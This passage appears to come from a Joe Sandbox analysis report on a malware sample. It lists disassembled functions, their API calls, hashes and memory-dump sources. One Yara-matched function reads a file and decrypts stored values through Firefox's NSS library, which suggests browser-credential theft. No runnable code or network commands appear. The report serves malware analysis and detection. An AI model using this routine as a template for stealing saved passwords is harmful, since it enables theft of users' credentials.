                                                                                                                                              • Instruction ID: ad52e606442738fb69f9cbd3010cb15feba9226b7a46cc4366883fff21151961
                                                                                                                                              • Opcode Fuzzy Hash: f2e4eef44b5bfbc992bf16197c2fb5e1701c9e9118a417ac9e894869d32b1b01
                                                                                                                                              • Instruction Fuzzy Hash: C5F1ACB1D00619AFDF10DF64D988BADBBB5BF09318F548169EC08A7711E731E895CB81
                                                                                                                                              Function 6C744C20 Relevance: 30.3, APIs: 20, Instructions: 290memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • TlsGetValue.KERNEL32 ref: 6C744C4C
                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 6C744C60
                                                                                                                                              • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6C744CA1
                                                                                                                                              • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 6C744CBE
                                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6C744CD2
                                                                                                                                              • realloc.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C744D3A
                                                                                                                                              • PORT_Alloc_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C744D4F
                                                                                                                                              • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6C744DB7
                                                                                                                                                • Part of subcall function 6C7ADD70: TlsGetValue.KERNEL32 ref: 6C7ADD8C
                                                                                                                                                • Part of subcall function 6C7ADD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C7ADDB4
                                                                                                                                                • Part of subcall function 6C6F07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C68204A), ref: 6C6F07AD
                                                                                                                                                • Part of subcall function 6C6F07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C68204A), ref: 6C6F07CD
                                                                                                                                                • Part of subcall function 6C6F07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C68204A), ref: 6C6F07D6
                                                                                                                                                • Part of subcall function 6C6F07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C68204A), ref: 6C6F07E4
                                                                                                                                                • Part of subcall function 6C6F07A0: TlsSetValue.KERNEL32(00000000,?,6C68204A), ref: 6C6F0864
                                                                                                                                                • Part of subcall function 6C6F07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C6F0880
                                                                                                                                                • Part of subcall function 6C6F07A0: TlsSetValue.KERNEL32(00000000,?,?,6C68204A), ref: 6C6F08CB
                                                                                                                                                • Part of subcall function 6C6F07A0: TlsGetValue.KERNEL32(?,?,6C68204A), ref: 6C6F08D7
                                                                                                                                                • Part of subcall function 6C6F07A0: TlsGetValue.KERNEL32(?,?,6C68204A), ref: 6C6F08FB
                                                                                                                                              • TlsGetValue.KERNEL32 ref: 6C744DD7
                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 6C744DEC
                                                                                                                                              • PR_Unlock.NSS3(?), ref: 6C744E1B
                                                                                                                                              • PR_SetError.NSS3(00000000,00000000), ref: 6C744E2F
                                                                                                                                              • PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C744E5A
                                                                                                                                              • PR_SetError.NSS3(00000000,00000000), ref: 6C744E71
                                                                                                                                              • free.MOZGLUE(00000000), ref: 6C744E7A
                                                                                                                                              • PR_Unlock.NSS3(?), ref: 6C744EA2
                                                                                                                                              • TlsGetValue.KERNEL32 ref: 6C744EC1
                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 6C744ED6
                                                                                                                                              • PR_Unlock.NSS3(?), ref: 6C744F01
                                                                                                                                              • free.MOZGLUE(00000000), ref: 6C744F2A
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Value$CriticalSectionUnlock$Enter$Error$callocfree$Alloc_LeaveUtilrealloc
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 759471828-0
                                                                                                                                              • Opcode ID: ddbc292f4e6ba06b94ce3cbdfb291df7b4b938dc948710057c40906b822d1aa6
                                                                                                                                              • Instruction ID: b7453952d36d14c6f3ef9c351b111d2f27e1c8f188b9aa2b2aaa198cd598e68c
                                                                                                                                              • Opcode Fuzzy Hash: ddbc292f4e6ba06b94ce3cbdfb291df7b4b938dc948710057c40906b822d1aa6
                                                                                                                                              • Instruction Fuzzy Hash: 8BB123B5A002069FDB11EF68D949AAA77B4BF0931CF048134ED1597B01EB34E961EFD2
                                                                                                                                              Function 0040CA90 Relevance: 30.1, APIs: 16, Strings: 1, Instructions: 383filestringCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • NSS_Init.NSS3(00000000), ref: 0040CAA5
                                                                                                                                                • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                                                                                                                • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                                                                                                                                • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                                                                                                                                • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                                                                                                                                • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                                                                                                                                • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                                                                                                                                • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                                                                                                                              • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,009A0240,00000000,?,00421544,00000000,?,?), ref: 0040CB6C
                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040CB89
                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000), ref: 0040CB95
                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040CBA8
                                                                                                                                              • ??_U@YAPAXI@Z.MSVCRT(-00000001), ref: 0040CBB5
                                                                                                                                              • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040CBD9
                                                                                                                                              • StrStrA.SHLWAPI(?,009A01E0,00420B56), ref: 0040CBF7
                                                                                                                                              • StrStrA.SHLWAPI(00000000,009A0258), ref: 0040CC1E
                                                                                                                                              • StrStrA.SHLWAPI(?,009A0CC8,00000000,?,00421550,00000000,?,00000000,00000000,?,009995C0,00000000,?,0042154C,00000000,?), ref: 0040CDA2
                                                                                                                                              • StrStrA.SHLWAPI(00000000,009A0D88), ref: 0040CDB9
                                                                                                                                                • Part of subcall function 0040C920: memset.MSVCRT ref: 0040C953
                                                                                                                                                • Part of subcall function 0040C920: lstrlenA.KERNEL32(?,00000001,?,00000000,00000000,00000000,00000000,?,009995F0), ref: 0040C971
                                                                                                                                                • Part of subcall function 0040C920: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0040C97C
                                                                                                                                                • Part of subcall function 0040C920: PK11_GetInternalKeySlot.NSS3 ref: 0040C98A
                                                                                                                                                • Part of subcall function 0040C920: PK11_Authenticate.NSS3(00000000,00000001,00000000), ref: 0040C9A5
                                                                                                                                                • Part of subcall function 0040C920: PK11SDR_Decrypt.NSS3(?,?,00000000), ref: 0040C9EB
                                                                                                                                                • Part of subcall function 0040C920: memcpy.MSVCRT(?,?,?), ref: 0040CA12
                                                                                                                                                • Part of subcall function 0040C920: PK11_FreeSlot.NSS3(?), ref: 0040CA61
                                                                                                                                              • StrStrA.SHLWAPI(?,009A0D88,00000000,?,00421554,00000000,?,00000000,009995F0), ref: 0040CE5A
                                                                                                                                              • StrStrA.SHLWAPI(00000000,00999560), ref: 0040CE71
                                                                                                                                                • Part of subcall function 0040C920: lstrcatA.KERNEL32(?,00420B47), ref: 0040CA43
                                                                                                                                                • Part of subcall function 0040C920: lstrcatA.KERNEL32(?,00420B4B), ref: 0040CA57
                                                                                                                                                • Part of subcall function 0040C920: lstrcatA.KERNEL32(?,00420B4E), ref: 0040CA78
                                                                                                                                              • lstrlenA.KERNEL32(00000000), ref: 0040CF44
                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0040CF9C
                                                                                                                                              • NSS_Shutdown.NSS3 ref: 0040CFAA
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2312969222.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_WGo3ga1AL9.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Filelstrcat$lstrcpy$K11_lstrlen$PointerSlot$AuthenticateBinaryCloseCreateCryptDecryptFreeHandleInitInternalReadShutdownSizeStringmemcpymemset
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3555573487-3916222277
                                                                                                                                              • Opcode ID: fd538e04aa803ba3ca2fa6a758a1c9083232b90b579bd12c1c91e16ce875de3e
                                                                                                                                              • Instruction ID: 4fdc336044367871c69213567fe42fce90f61d04e08d5fff212e48b059342ccf
                                                                                                                                              • Opcode Fuzzy Hash: fd538e04aa803ba3ca2fa6a758a1c9083232b90b579bd12c1c91e16ce875de3e
                                                                                                                                              • Instruction Fuzzy Hash: 2AE13E71D05108ABCB14EBA1DCA6FEEB779AF14304F00419EF10663191EF387A99CB69
                                                                                                                                              Function 6C715DB0 Relevance: 30.0, APIs: 16, Strings: 1, Instructions: 238memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • NSS_GetAlgorithmPolicy.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C715DEC
                                                                                                                                              • PR_SetError.NSS3(FFFFE0B5,00000000,?,?,?,?,?,?,?,?), ref: 6C715E0F
                                                                                                                                              • PORT_ZAlloc_Util.NSS3(00000828), ref: 6C715E35
                                                                                                                                              • SECKEY_CopyPublicKey.NSS3(?), ref: 6C715E6A
                                                                                                                                              • HASH_GetHashTypeByOidTag.NSS3(00000000), ref: 6C715EC3
                                                                                                                                              • NSS_GetAlgorithmPolicy.NSS3(00000000,00000020), ref: 6C715ED9
                                                                                                                                              • SECKEY_SignatureLen.NSS3(?), ref: 6C715F09
                                                                                                                                              • PR_SetError.NSS3(FFFFE0B5,00000000), ref: 6C715F49
                                                                                                                                              • SECKEY_DestroyPublicKey.NSS3(?), ref: 6C715F89
                                                                                                                                              • free.MOZGLUE(?), ref: 6C715FA0
                                                                                                                                              • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C715FB6
                                                                                                                                              • free.MOZGLUE(00000000), ref: 6C715FBF
                                                                                                                                              • memcpy.VCRUNTIME140(?,?,00000000), ref: 6C71600C
                                                                                                                                              • memcpy.VCRUNTIME140(?,?,00000000), ref: 6C716079
                                                                                                                                              • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C716084
                                                                                                                                              • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C716094
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Util$Item_Zfree$AlgorithmErrorPolicyPublicfreememcpy$Alloc_CopyDestroyHashSignatureType
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2310191401-3916222277
                                                                                                                                              • Opcode ID: 695986754f6c231ba3fc36c3deff84f383a94ee3e62f1d43996aa69d5fc5d4e6
                                                                                                                                              • Instruction ID: b94ccac621357197893be13492317e0f8dcc34067423928a216b2ce39a1021cc
                                                                                                                                              • Opcode Fuzzy Hash: 695986754f6c231ba3fc36c3deff84f383a94ee3e62f1d43996aa69d5fc5d4e6
                                                                                                                                              • Instruction Fuzzy Hash: E68117B1E082059BDB548E64EE89B9E77B9AF05318F1C4138E819A7F81E731D908CBD1
                                                                                                                                              Function 6C736D60 Relevance: 29.9, APIs: 9, Strings: 8, Instructions: 119COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • PR_LogPrint.NSS3(C_Digest), ref: 6C736D86
                                                                                                                                              • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C736DB4
                                                                                                                                              • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C736DC3
                                                                                                                                                • Part of subcall function 6C81D930: PL_strncpyz.NSS3(?,?,?), ref: 6C81D963
                                                                                                                                              • PR_LogPrint.NSS3(?,00000000), ref: 6C736DD9
                                                                                                                                              • PR_LogPrint.NSS3( pData = 0x%p,?), ref: 6C736DFA
                                                                                                                                              • PR_LogPrint.NSS3( ulDataLen = %d,?), ref: 6C736E13
                                                                                                                                              • PR_LogPrint.NSS3( pDigest = 0x%p,?), ref: 6C736E2C
                                                                                                                                              • PR_LogPrint.NSS3( pulDigestLen = 0x%p,?), ref: 6C736E47
                                                                                                                                              • PR_LogPrint.NSS3( *pulDigestLen = 0x%x,?), ref: 6C736EB9
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Print$L_strncpyz$L_strcatn
                                                                                                                                              • String ID: *pulDigestLen = 0x%x$ hSession = 0x%x$ pData = 0x%p$ pDigest = 0x%p$ pulDigestLen = 0x%p$ ulDataLen = %d$ (CK_INVALID_HANDLE)$C_Digest
                                                                                                                                              • API String ID: 1003633598-2270781106
                                                                                                                                              • Opcode ID: 06b9d34c023a35b11c90064add2789638d3fd039590d6dadc22c31a93e92c3fb
                                                                                                                                              • Instruction ID: ac4cd96a87c3888e2e0e5bc1269d9067983875434e357b305cc1d7ba469ed869
                                                                                                                                              • Opcode Fuzzy Hash: 06b9d34c023a35b11c90064add2789638d3fd039590d6dadc22c31a93e92c3fb
                                                                                                                                              • Instruction Fuzzy Hash: E141E635605025AFDB219B55CE4DE6A3BB5BB4230CF046474F8099BB13DB38A958CBD2
                                                                                                                                              Function 6C739C40 Relevance: 29.9, APIs: 9, Strings: 8, Instructions: 118COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • PR_LogPrint.NSS3(C_LoginUser), ref: 6C739C66
                                                                                                                                              • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C739C94
                                                                                                                                              • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C739CA3
                                                                                                                                                • Part of subcall function 6C81D930: PL_strncpyz.NSS3(?,?,?), ref: 6C81D963
                                                                                                                                              • PR_LogPrint.NSS3(?,00000000), ref: 6C739CB9
                                                                                                                                              • PR_LogPrint.NSS3( userType = 0x%x,?), ref: 6C739CDA
                                                                                                                                              • PR_LogPrint.NSS3( pPin = 0x%p,?), ref: 6C739CF5
                                                                                                                                              • PR_LogPrint.NSS3( ulPinLen = %d,?), ref: 6C739D10
                                                                                                                                              • PR_LogPrint.NSS3( pUsername = 0x%p,?), ref: 6C739D29
                                                                                                                                              • PR_LogPrint.NSS3( ulUsernameLen = %d,?), ref: 6C739D42
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Print$L_strncpyz$L_strcatn
                                                                                                                                              • String ID: hSession = 0x%x$ pPin = 0x%p$ pUsername = 0x%p$ ulPinLen = %d$ ulUsernameLen = %d$ userType = 0x%x$ (CK_INVALID_HANDLE)$C_LoginUser
                                                                                                                                              • API String ID: 1003633598-3838449515
                                                                                                                                              • Opcode ID: 3e5b224960560c18deeabc443af5e71a4859300c018ae191c204348c7976a228
                                                                                                                                              • Instruction ID: ed919dd97fa37b5914555c78183de323d5c20778ace3cf8d78d834640f39b5ad
                                                                                                                                              • Opcode Fuzzy Hash: 3e5b224960560c18deeabc443af5e71a4859300c018ae191c204348c7976a228
                                                                                                                                              • Instruction Fuzzy Hash: 41411631605025ABDB218F55DF4EE6A3BB6AB5230DF446474F40D5BB13CB38A818CBD1
                                                                                                                                              Function 6C819C60 Relevance: 27.2, APIs: 18, Instructions: 202threadCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • calloc.MOZGLUE(00000001,00000080), ref: 6C819C70
                                                                                                                                              • PR_NewLock.NSS3 ref: 6C819C85
                                                                                                                                                • Part of subcall function 6C7C98D0: calloc.MOZGLUE(00000001,00000084,6C6F0936,00000001,?,6C6F102C), ref: 6C7C98E5
                                                                                                                                              • PR_NewCondVar.NSS3(00000000), ref: 6C819C96
                                                                                                                                                • Part of subcall function 6C6EBB80: calloc.MOZGLUE(00000001,00000084,00000000,00000040,?,6C6F21BC), ref: 6C6EBB8C
                                                                                                                                              • PR_NewLock.NSS3 ref: 6C819CA9
                                                                                                                                                • Part of subcall function 6C7C98D0: InitializeCriticalSectionAndSpinCount.KERNEL32(0000001C,000005DC), ref: 6C7C9946
                                                                                                                                                • Part of subcall function 6C7C98D0: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C6816B7,00000000), ref: 6C7C994E
                                                                                                                                                • Part of subcall function 6C7C98D0: free.MOZGLUE(00000000), ref: 6C7C995E
                                                                                                                                              • PR_NewLock.NSS3 ref: 6C819CB9
                                                                                                                                              • PR_NewLock.NSS3 ref: 6C819CC9
                                                                                                                                              • PR_NewCondVar.NSS3(00000000), ref: 6C819CDA
                                                                                                                                                • Part of subcall function 6C6EBB80: PR_SetError.NSS3(FFFFE890,00000000), ref: 6C6EBBEB
                                                                                                                                                • Part of subcall function 6C6EBB80: InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,000005DC), ref: 6C6EBBFB
                                                                                                                                                • Part of subcall function 6C6EBB80: GetLastError.KERNEL32 ref: 6C6EBC03
                                                                                                                                                • Part of subcall function 6C6EBB80: PR_SetError.NSS3(FFFFE8AA,00000000), ref: 6C6EBC19
                                                                                                                                                • Part of subcall function 6C6EBB80: free.MOZGLUE(00000000), ref: 6C6EBC22
                                                                                                                                              • PR_NewCondVar.NSS3(?), ref: 6C819CF0
                                                                                                                                              • PR_NewPollableEvent.NSS3 ref: 6C819D03
                                                                                                                                                • Part of subcall function 6C80F3B0: PR_CallOnce.NSS3(6C8614B0,6C80F510), ref: 6C80F3E6
                                                                                                                                                • Part of subcall function 6C80F3B0: PR_CreateIOLayerStub.NSS3(6C86006C), ref: 6C80F402
                                                                                                                                                • Part of subcall function 6C80F3B0: PR_Malloc.NSS3(00000004), ref: 6C80F416
                                                                                                                                                • Part of subcall function 6C80F3B0: PR_NewTCPSocketPair.NSS3(?), ref: 6C80F42D
                                                                                                                                                • Part of subcall function 6C80F3B0: PR_SetSocketOption.NSS3(?), ref: 6C80F455
                                                                                                                                                • Part of subcall function 6C80F3B0: PR_PushIOLayer.NSS3(?,000000FE,00000000), ref: 6C80F473
                                                                                                                                                • Part of subcall function 6C7C9890: TlsGetValue.KERNEL32(?,?,?,6C7C97EB), ref: 6C7C989E
                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 6C819D78
                                                                                                                                              • calloc.MOZGLUE(00000001,0000000C), ref: 6C819DAF
                                                                                                                                              • _PR_CreateThread.NSS3(00000000,6C819EA0,00000000,00000001,00000001,00000000,?,00000000), ref: 6C819D9F
                                                                                                                                                • Part of subcall function 6C6EB3C0: TlsGetValue.KERNEL32 ref: 6C6EB403
                                                                                                                                                • Part of subcall function 6C6EB3C0: _PR_NativeCreateThread.NSS3(?,?,?,?,?,?,?,?), ref: 6C6EB459
                                                                                                                                              • _PR_CreateThread.NSS3(00000000,6C81A060,00000000,00000001,00000001,00000000,?,00000000), ref: 6C819DE8
                                                                                                                                              • calloc.MOZGLUE(00000001,0000000C), ref: 6C819DFC
                                                                                                                                              • _PR_CreateThread.NSS3(00000000,6C81A530,00000000,00000001,00000001,00000000,?,00000000), ref: 6C819E29
                                                                                                                                              • calloc.MOZGLUE(00000001,0000000C), ref: 6C819E3D
                                                                                                                                              • _PR_MD_UNLOCK.NSS3(?), ref: 6C819E71
                                                                                                                                              • PR_SetError.NSS3(FFFFE890,00000000), ref: 6C819E89
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: calloc$CreateError$LockThread$CondCriticalSection$CountInitializeLastLayerSocketSpinValuefree$CallEnterEventMallocNativeOnceOptionPairPollablePushStub
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4254102231-0
                                                                                                                                              • Opcode ID: 282b1e2fcf4c85fb385c5cad9dea92a41498f76471863691ae359d815860194e
                                                                                                                                              • Instruction ID: ba5b044850280a87e7dda3fa3a53f09646c648dc99f07f85fc15ae71081e18d9
                                                                                                                                              • Opcode Fuzzy Hash: 282b1e2fcf4c85fb385c5cad9dea92a41498f76471863691ae359d815860194e
                                                                                                                                              • Instruction Fuzzy Hash: 92613DB1A00706AFD725DF75D944AA7BBE8FF49208B04493AE819C7B11EB70E414CBE5
                                                                                                                                              Function 6C758E40 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 198stringmemoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • memchr.VCRUNTIME140(abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_,00000000,00000041,6C758E01,00000000,6C759060,6C860B64), ref: 6C758E7B
                                                                                                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,6C758E01,00000000,6C759060,6C860B64), ref: 6C758E9E
                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(6C860B64,00000001,?,?,?,?,6C758E01,00000000,6C759060,6C860B64), ref: 6C758EAD
                                                                                                                                              • memcpy.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,?,6C758E01,00000000,6C759060,6C860B64), ref: 6C758EC3
                                                                                                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(5D8B5657,?,?,?,?,?,?,?,?,?,6C758E01,00000000,6C759060,6C860B64), ref: 6C758ED8
                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,6C758E01,00000000,6C759060,6C860B64), ref: 6C758EE5
                                                                                                                                              • memcpy.VCRUNTIME140(00000000,5D8B5657,00000001,?,?,?,?,?,?,?,?,?,?,?,?,6C758E01), ref: 6C758EFB
                                                                                                                                              • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C860B64,6C860B64), ref: 6C758F11
                                                                                                                                              • PORT_ArenaGrow_Util.NSS3(?,5D8B5657,643D8B08), ref: 6C758F3F
                                                                                                                                                • Part of subcall function 6C75A110: PORT_ArenaGrow_Util.NSS3(8514C483,EB2074C0,184D8B3E,?,00000000,00000000,00000000,FFFFFFFF,?,6C75A421,00000000,00000000,6C759826), ref: 6C75A136
                                                                                                                                              • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C75904A
                                                                                                                                              Strings
